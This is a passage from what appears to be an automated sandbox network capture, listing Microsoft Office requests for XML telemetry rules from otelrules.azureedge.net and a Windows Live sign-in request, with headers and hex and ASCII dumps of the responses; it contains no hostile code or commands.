                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210237Z-17c5cb586f672xmrz843mf85fn00000004eg000000002mdp
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                107192.168.2.54988413.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:37 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:38 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: af2b1dc9-001e-0066-0d6c-27561e000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210238Z-16849878b786fl7gm2qg4r5y7000000005ug00000000feb1
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                108192.168.2.54988613.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:38 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 1952
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: bb28544f-801e-0047-7562-267265000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210238Z-16849878b782d4lwcu6h6gmxnw000000058g000000009z7h
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                109192.168.2.54988513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:38 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 174
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210238Z-16849878b78xblwksrnkakc08w00000004qg00000000yvby
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                110192.168.2.54988713.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:38 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 958
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: c3c63728-001e-0082-75c8-275880000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210238Z-17c5cb586f6hn8cl90dxzu28kw00000005m0000000005bac
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                111192.168.2.54988913.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:38 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:38 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 501
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210238Z-16849878b78g2m84h2v9sta29000000004cg00000000swnh
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                112192.168.2.54989113.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:39 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 2592
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 5a802a50-001e-0049-3f00-255bd5000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210239Z-15b8d89586f4zwgbgswvrvz4vs00000006w00000000077rd
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                113192.168.2.54989013.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:39 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 3342
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 41937e91-c01e-008e-5d57-277381000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210239Z-16849878b785dznd7xpawq9gcn000000070g00000000630x
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                114192.168.2.54988820.190.159.0443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:39 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Expires: Mon, 28 Oct 2024 21:01:39 GMT
                                                                                                                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                x-ms-route-info: C555_BL2
